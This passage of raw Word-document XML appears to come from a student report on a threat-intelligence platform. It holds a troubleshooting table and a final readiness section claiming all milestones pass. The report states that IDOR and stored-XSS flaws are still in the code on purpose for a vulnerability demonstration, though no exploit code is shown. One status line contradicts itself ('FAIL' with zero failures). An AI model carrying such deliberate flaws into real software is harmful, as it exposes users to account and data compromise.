              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sign in as 'analyst_riya' on Screen 1 before opening Screen 3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Report submission rejected (Missing fields)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Field name mismatch between client and controller.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Check browser DevTools Network tab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Ensure both title, summary, and contentMarkdown fields contain non-empty strings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Audit verification fails (TAMPERING_DETECTED)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>An out-of-band manual UPDATE or DELETE was executed directly in SQLite.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>node scripts/verify-audit-chain.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F9FAFB"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reset database cleanly by removing SQLite file and restarting the server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Vulnerability test fails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Test database was modified by manual concurrent requests.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>npm run test:vuln</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Run the test isolated: node --test tests/vulnerability/vulnerabilityDemo.test.js.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SECTION 6 — FINAL STATUS &amp; DEMO READINESS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.1 Formal Verification Audit Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] Startup &amp; Core: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS: Core application startup, health probes, relational database initialization, and UI asset serving.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] Identity &amp; MFA: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS: Multi-factor authentication (Bcrypt salting, RFC 6238 TOTP, and HMAC-SHA256 JWT generation).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] Ingestion Layer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS: Strategy Pattern IoC validation, ReDoS-resistant regular expressions, and automatic canonical defanging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] Triage Workbench: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS: Analyst triage workflow, mandatory review logging, and MITRE ATT&amp;CK technique classification.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] Dissemination Layer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS: Server-side canAccessTLP filtering and OASIS STIX 2.1 threat feed distribution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] Audit Integrity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS: Continuous SHA-256 hash-chained audit logging and offline verification utility.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] Security Monitoring: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS: Standard Prometheus /metrics exposition with all 5 required security telemetry counters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] Vulnerability Tests: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS: Milestone M11 automated vulnerability demonstration suite (5/5 tests passing).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[PASS] Regression Suite: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PASS: Full platform regression test suite (53/53 tests passing across 10 test suites).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.2 Readiness Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A. PASS: The platform satisfies all requirements for Milestones M1 through M11 without errors or regressions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Failures: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>B. FAIL: Zero (0) test failures detected across 53 unit and integration test cases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Blockers: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C. BLOCKERS: Zero (0) critical bugs, unhandled exceptions, or operational blockers identified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Demo Readiness: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>D. Live Demonstration Readiness: YES. The application is 100% ready for live faculty evaluation and viva examination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-M12 Baseline: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>E. Pre-M12 Requirements: Milestone M11 documentation accepted; vulnerability evidence preserved in evidence/M11_VULNERABILITY_DEMONSTRATION.md; regression baseline verified.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Next Step: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>F. Recommended Next Task: Await faculty approval, then proceed to Milestone M12 (Secure Refactoring &amp; Security Hardening) to remediate V02 (IDOR) and V04 (Stored XSS).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